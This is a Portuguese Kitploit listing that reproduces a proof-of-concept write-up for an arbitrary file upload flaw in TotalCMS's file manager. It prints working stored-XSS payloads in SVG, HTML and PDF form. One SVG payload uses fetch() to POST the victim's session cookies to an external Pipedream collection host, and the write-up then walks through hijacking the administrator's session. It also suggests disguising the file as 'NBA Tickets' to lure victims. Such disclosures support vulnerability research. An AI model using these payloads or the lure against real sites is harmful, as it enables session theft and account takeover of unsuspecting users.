Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
TotalCMS-Arbitrary_File-Upload--XSS_Steal_Cookies---TotalDepot — O TotalCMS é afetado por uma vulnerabilidade de Upload Arbitrário de Arquivos - XSS, que permite Cross-Site Scripting (XSS) Armazenado e também o roubo de cookies de sessão. | Kitploit
Ferramentas/GitHubGitHub/sromanhu/totalcms-arbitrary_file-upload--xss_steal_cookies---totaldepot
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosAprendizado e Educação
GitHubsromanhu/totalcms-arbitrary_file-upload--xss_steal_cookies---totaldepot

TotalCMS-Arbitrary_File-Upload--XSS_Steal_Cookies---TotalDepot

O TotalCMS é afetado por uma vulnerabilidade de Upload Arbitrário de Arquivos - XSS, que permite Cross-Site Scripting (XSS) Armazenado e também o roubo de cookies de sessão.

Ver Repositório
3há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

TotalCMS Arbitrary File Upload - XSS e roubo de cookies

Autor: (Sergio)

Descrição: O TotalCMS é afetado por uma vulnerabilidade de Upload Arbitrário de Arquivos - XSS que permite Cross-Site Scripting (XSS) e também o roubo de cookies de sessão

Vetores de Ataque: Uma vulnerabilidade na sanitização de upload de arquivos do "Total Depot" permite que você envie um arquivo PDF / SVG / HTML com alert oculto de Cross-Site Scripting (XSS) e roube os cookies do usuário.


Vou fazer 2 PoCs:

- POC 1: Cross-Site Scripting (XSS) em arquivos PDF / SVG e HTML

- POC 2: Roubo de cookies do usuário e encaminhamento para um servidor externo para interceptá-los e se passar pelo usuário.

Começamos com a primeira PoC:

POC 1: Cross-Site Scripting (XSS) em arquivos PDF / SVG e HTML

Modificamos o payload para roubar cookies e enviá-los para a Request do Pipedream, para que possamos nos passar pelo usuário. Agora vamos nos passar pelo usuário. Para testar, abrimos uma sessão em TotalCMS/admin em outro navegador e abrimos o complemento "Cookie Editor".

Ao fazer login no painel administrativo (https://www.totalcms.co/demo/total-cms/admin/), iremos ao "Total Depot" no Site de Administração e enviaremos os arquivos PDF / SVG e HTML com o XSS oculto.

Aqui estão os payloads:

Payload XSS em PDF:

É um payload XSS gerado com a ferramenta JS2PDFInjector e um payload JS que contém o seguinte conteúdo:

root@kitploit:~
app.alert("XSS");

Payload SVG:

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

Payload HTML:

root@kitploit:~
<html>
	<script>
		alert(document.cookie);
	</script>
</html>

image

image

Depois de enviados, se clicarmos no link, podemos ver o caminho onde eles são armazenados:

image

CAMINHO dos arquivos:

image

image

image

E este é o resultado com o Cross-Site Scripting (XSS) dos 3 tipos de arquivos e com os cookies do usuário:

image

image

image

Continuamos com a segunda PoC:

- POC 2: Roubo de cookies do usuário e encaminhamento para um servidor externo para interceptá-los e se passar pelo usuário.

Vamos fingir que somos um cibercriminoso e vamos roubar os cookies de sessão do usuário, que serão enviados para o servidor.

Neste caso, enviei um arquivo como PoC, mas em um caso real, podemos enviar um arquivo com um nome interessante "NBA Tickets" e publicá-lo, para que o usuário vítima me envie os cookies ao executar o arquivo, sem perceber.


Primeiro, realizamos um teste para ver se temos comunicação com um servidor externo.

Aqui está o payload:

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"        
height="200"        
zoomAndPan="disable"        
xmlns="http://www.w3.org/2000/svg"        
xmlns:xlink="http://www.w3.org/1999/xlink"        
xml:space="preserve">
<!-- Script linked from the outside-->     
<script xlink:href="https://enbjn0l9vbowi.x.pipedream.net/" />     
<script>       
//<![CDATA[         
alert("XSS");       
]]>     
</script>   
</svg>

image

image

Como vemos na Request do Pipedream, obtivemos a requisição corretamente.



Aqui está o payload:

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"        
height="200"        
zoomAndPan="disable"        
xmlns="http://www.w3.org/2000/svg"        
xmlns:xlink="http://www.w3.org/1999/xlink"        
xml:space="preserve">
<!-- Script linked from the outside-->     
<script>
  fetch('https://enbjn0l9vbowi.x.pipedream.net/', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
  });
</script>   
</svg>

Executamos:


image

image

Como vemos na imagem, obtivemos corretamente os cookies de sessão do usuário.


image

Modificamos o cookie de sessão para o obtido no Pipedream e salvamos.

image

Recarregamos o site e nos passamos pelo usuário administrador.

image


Informações Adicionais:

https://www.totalcms.co/

https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html

Baixar ferramenta